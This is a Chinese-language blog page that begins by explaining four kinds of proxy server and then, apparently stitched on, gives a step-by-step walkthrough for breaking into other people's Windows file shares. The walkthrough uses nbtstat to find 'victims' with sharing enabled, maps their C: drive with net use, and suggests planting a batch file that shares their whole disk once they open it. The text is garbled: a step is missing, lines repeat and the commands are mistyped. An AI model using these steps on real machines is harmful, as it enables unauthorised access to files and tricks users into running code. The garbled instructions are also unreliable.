<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        josyaaa
    </title>
    <meta name="description" content= okay!😯 hacking time >
    <meta name="keywords" content= Blog,Hexo,Theme,刘训灼,LiuXunzhuo >
    
<link rel="stylesheet" href="/josyaaa/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/josyaaa/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/josyaaa/css/style.css">

<meta name="generator" content="Hexo 6.2.0"></head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            设置服务器代理
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="1-透明代理服务器"><a href="#1-透明代理服务器" class="headerlink" title="1. 透明代理服务器"></a>1. 透明代理服务器</h1><p>这种类型的代理服务器将自己标识为代理服务器，并通过 http 标头使原始 IP 地址可用。这些通常用于加速网页浏览，因为它们具有非常好的缓存网站的能力。但他们不会隐藏其用户的 IP。它被广泛称为透明代理，因为它会将您的真实 IP 地址暴露给网络。这种类型的代理服务器不会隐藏您的 IP 地址。</p>
<h1 id="2-匿名代理服务器"><a href="#2-匿名代理服务器" class="headerlink" title="2.匿名代理服务器"></a>2.匿名代理服务器</h1><p>这种类型的代理服务器将自己标识为代理服务器，但不会使原始IP地址可用。这种类型的代理服务器是可检测的，但为大多数用户提供了合理的匿名性。这种类型的代理服务器将隐藏您的 IP 地址。</p>
<h1 id="3-扭曲代理服务器"><a href="#3-扭曲代理服务器" class="headerlink" title="3. 扭曲代理服务器"></a>3. 扭曲代理服务器</h1><p>这种类型的代理服务器将自己标识为代理服务器，但通过 http 标头提供了不正确的原始 IP 地址。这种类型的代理服务器将隐藏您的 IP 地址。</p>
<h1 id="4-高匿名代理服务器（精英代理）"><a href="#4-高匿名代理服务器（精英代理）" class="headerlink" title="4. 高匿名代理服务器（精英代理）"></a>4. 高匿名代理服务器（精英代理）</h1><p>这种类型的代理服务器不将自己标识为代理服务器，也不提供原始 IP 地址。这种类型的代理服务器会隐藏您的 IP 地址。所以这是屏蔽您的 IP 的最佳方式。</p>
<p><strong>High Anonymity Proxy or Elite Proxy is the best to hide your IP</strong></p>
<h2 id="IP"><a href="#IP" class="headerlink" title="IP"></a>IP</h2><ul>
<li>第1步：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;</span><br><span class="line">现在转到Star并单击Run，然后键入“CMD”并按Enter。</span><br><span class="line">命令提示符将打开。</span><br></pre></td></tr></table></figure>

<ul>
<li>第 2 步：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&gt;输入 cmd 为“ nbtstat -a IPaddressOfVictim”  ，然后按 Enter。</span><br><span class="line">----------------------------------------------------------</span><br><span class="line">例如：</span><br><span class="line">             nbstat -a 223.222.222.222</span><br><span class="line">---------------------------------------             </span><br><span class="line">如果您在 NetBIOS 远程机器名称表中看到这个</span><br><span class="line">---------------------------------------</span><br><span class="line">\名称 类型 状态 —————————————————————</span><br><span class="line">user&lt;00&gt; UNIQUE 注册</span><br><span class="line">工作组 &lt;00&gt; GROUP 注册</span><br><span class="line">用户 &lt;03&gt; UNIQUE 注册</span><br><span class="line">用户 &lt;20&gt; UNIQUE 注册</span><br><span class="line">----------------------------------</span><br><span class="line">MAC地址= xx-xx-xx-xx-xx-xx</span><br><span class="line">—————————————————————</span><br><span class="line">如果你没有得到数字&lt;20&gt;。</span><br><span class="line">受害者禁用了文件和打印机共享，找到另一个受害者。</span><br></pre></td></tr></table></figure>

<ul>
<li>第 4 步：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&gt;</span><br><span class="line">现在键入“net use x:\IPaddressOfVictimCDISK”，然后按 Enter&gt;</span><br><span class="line">---------------------------------------------------------</span><br><span class="line">用 vitim 的 IP 地址代替“IPaddressOfVictim.</span><br><span class="line">---------------------------------------------------------</span><br><span class="line">你可以用任何字母代替“x”。</span><br><span class="line">---------------------------------------------------------</span><br><span class="line">例如：</span><br><span class="line">             net use x:\223.222.222.222CDISK</span><br></pre></td></tr></table></figure>

<ul>
<li>第 5 步：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">现在打开 Windows 资源管理器或双击</span><br><span class="line">桌面上的“我的电脑”图标，您将看到一个新的网络驱动器</span><br><span class="line">---------------------------------------------</span><br><span class="line">现在打开 Windows 资源管理器或双击</span><br><span class="line">桌面上的“我的电脑”图标，您将看到一个新的网络驱动器 X:</span><br><span class="line">---------------------------------------------</span><br><span class="line">仅当您的网络上有某人的 ip 时，此 hack 才会起作用。如果您要“破解”的人的 ip 不在您的网络上，它将无法正常工作。</span><br><span class="line">--------------------------------------------------------------------------------------------------------</span><br><span class="line">如果您只能访问您的目标共享文件夹，则在他们的共享文件夹中放置一个批处理文件，如果他们打开它，使用命令 C=C，它将共享他们的硬盘。</span><br></pre></td></tr></table></figure>

    </div>

    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>
    <div class="footer" id="footer">
    <p><h4>Copyright © 2022 | Author: josyaaa | Theme by <a class="theme-author" href="https://github.com/josyaaa" style="font-size:14px; color: #969696">hacking</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="">
<input type="hidden" id="valine_appKey" value="">

<script src="/josyaaa/libs/jquery.min.js"></script>


<script src="/josyaaa/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/josyaaa/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>

    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
